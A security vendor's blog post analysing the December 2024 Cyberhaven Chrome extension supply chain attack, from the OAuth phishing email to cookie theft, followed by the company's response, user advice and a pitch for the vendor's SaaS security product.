Demo Request
Take a personalized product tour with a member of our team to see how we can help make your existing security teams and tools more effective within minutes.
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Home
Blog
Cyberhaven Supply Chain Attack: How One Phishing Email Led to Over 400,000 Compromised Browsers

Cyberhaven Supply Chain Attack: How One Phishing Email Led to Over 400,000 Compromised Browsers

Kate Turchin
Updated
December 30, 2024
December 31, 2024
5 minutes

On December 24, 2024, Cyberhaven, a data loss prevention provider, experienced a security breach involving its Chrome browser extension. What started as a phishing email led to a poisoned Chrome extension and quickly resulted in an estimated 400,000 compromised browsers. 

Leveraging existing browser extension permissions and adding new ones, the threat actors were able to leak cookies and tokens, view browser history, exfiltrate data, and gain access to new victims.

Attack Overview

The attack started with a phishing email that pretended to be from Google Support. It warned the admin that the extension violated policies and was at risk of being removed.

The phishing link led to what looked like a legitimate Google OAuth page, where the admin unknowingly approved a malicious app called "Privacy Policy Extension."

This allowed the attackers to bypass MFA and gain full access to the Chrome Web Store developer account. Next, the attackers uploaded a new version of the extension (v24.10.4), embedding malicious code that went undetected by Google’s automated security scans. The malicious version was automatically pushed to Cyberhaven’s user base.

This compromised extension was active for approximately 25 hours before Cyberhaven detected and removed it.

The Attack Chain

  1. A phishing email was received targeting ChromeOS & Chrome Enterprise developers.
  2. A developer clicked the phishing link, entered their credentials, and granted OAuth permissions to a malicious app.
  3. Threat actors gained access to the Chrome extension development environment and made unauthorized changes.
  4. A malicious version of Chrome extension was added to the Chrome Web Store.
  5. The malicious extension was auto-updated for 400,000 users.
  6. Browser cookies and credentials were stolen, targeting Facebook Ads accounts and certain AI platforms.
Figure 1: The Attack Chain

Technical Analysis

The malicious extension was a modified version of Cyberhaven's legitimate extension, with added code designed to:

  • Contact a Command and Control (C&C) Server: The extension reached out to a hardcoded domain, cyberhavenext[.]pro, to fetch further instructions.
  • Monitor User Activity: It registered listeners to capture user interactions, particularly focusing on specific websites.
  • Exfiltrate Data: The primary objective was to steal browser cookies and authenticated sessions, especially targeting Facebook Ads accounts.

The Impact

CybeCyberhaven’s Chrome extension was compromised and malicious code distributed to an estimated 400,000 enterprise users. The malicious app was designed to steal sensitive information like session cookies and credentials, with a specific focus on taking over Facebook Ads accounts.

This incident was not isolated to Cyberhaven. It was part of a broader campaign where hackers targeted and compromised multiple companies' Chrome extensions in order to create a wide network of backdoors to steal sensitive data. According to Secure Annex, the list of potentially poisoned extensions has risen to 29 and counting.

The Implications

The attacker bypassed standard MFA protections by exploiting a common yet under-secured SaaS-to-SaaS connection: 4th party apps. 4th party apps are software or scripts that are connected to your third-party apps. While they don't integrate with your system directly, they are connected by proxy and represent potential vulnerabilities outside of an organization’s purview and control. 

Supply chain attacks are increasing, with one report pointing to as much as 180%. As organizations increasingly rely on third-party applications to support and scale business operations, the attack surface becomes a web of machine-to-machine connections, identities, and permissions. Least privilege access can’t help when admins fall victim to phishing scams. And while identities are difficult to hijack when they have MFA enabled, there can be no MFA on app to app. This chain underscores just how vulnerable even secure systems can be when their third-party vendors become compromised.

Cyberhaven's Response

Upon discovering the breach on December 25, Cyberhaven acted swiftly:

  • Removed the Malicious Extension: The compromised version was taken down within an hour of detection.
  • Released a Clean Update: A new, secure version (24.10.5) of the extension was published promptly.
  • Notified Affected Parties: Customers were informed about the incident and advised to check their systems for any suspicious activity.
  • Enhanced Security Measures: The company engaged an external incident response firm for forensic analysis and is cooperating with federal law enforcement to prevent future incidents.

Recommendations for Users

Users who had the compromised extension installed should:

  • Update the Extension: Ensure it's updated to version 24.10.5 or newer.
  • Reset Sessions: Ensure stolen cookies are invalidated.
  • Review Account Activity: Check for any unauthorized access, especially on platforms like Facebook Ads.
  • Change Passwords: Rotate passwords, particularly those not using FIDO2 multi-factor authentication.

How Reco Can Help

Reco, a leading SaaS security solution, is purpose-built to address and prevent SaaS supply chain attacks like the Cyberhaven attack.

  • ITDR (Identity Threat Detection and Response): Reco monitors for identity-related threats, like compromised SaaS admin accounts or anomalous token activity based on suspicious IP addresses, locations, devices, and more. For example, Reco provides real-time alerts (see Figure 2), enabling you to act before an incident escalates.
  • Posture Management: Reco reduces risks by identifying and addressing misconfigurations, such as overpermissioned users and admins, as well as high-risk authenticated tokens.
  • SaaS to SaaS monitoring: Reco provides visibility into all 4th party apps and permission risks. Proactively identify Chrome extensions with overly permissive settings and gain visibility into app-to-app connections to prevent or reduce the impact of supply chain attacks.
Figre 2: Reco Real-Time Alerts on Supply Chain Attack

Ready to Secure Your SaaS Ecosystem? Get Started with Reco Today

Reco can help organizations reduce the risk of supply chain attacks like the Cyberhaven attack, as well as detect and respond to them in real time. Our AI-based graph technology provides visibility into every app, identity, and their actions, allowing organizations to seamlessly prioritize and remediate risks and active threats. Reach out for a demo of Reco today.

ABOUT THE AUTHOR

Kate Turchin

Kate Turchin is the Director of Demand Generation at Reco.

Technical Review by:
Gal Nakash
Technical Review by:
Kate Turchin

Kate Turchin is the Director of Demand Generation at Reco.

Request a Demo
Table of Contents
Overview
Get the Latest SaaS Security Insights
Subscribe to receive updates on the latest cyber security attacks and trends in SaaS Security.
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Explore Related Posts

SaaS Security
4 minutes

JPMorgan Chase CISO Names SaaS Security as Top Priority. Here's Why.

Ofer Klein
December 30, 2024
Pat Opet, Chief information Security Officer (CISO) at JPMorgan Chase, recently named SaaS security as a top priority for 2025. Learn why it should be your top priority, too, and best practices for securing SaaS applications.
SaaS Security
4 minutes

CISA Demands Federal Agencies Secure SaaS Apps. Here’s How to Get it Right.

Kate Turchin
December 23, 2024
CISA recently released requirements for federal agencies to secure SaaS applications like Microsoft 365. Learn five steps to get SaaS security right.
SaaS Security
3 minutes

How Reco Discovers Shadow SaaS and Shadow AI

Kate Turchin
December 16, 2024
Reco's shadow SaaS and shadow AI discovery solution can identify all applications and copilots being used by employees, rank their level of risk, and provide insight into who is using what and how.
See more articles from our blog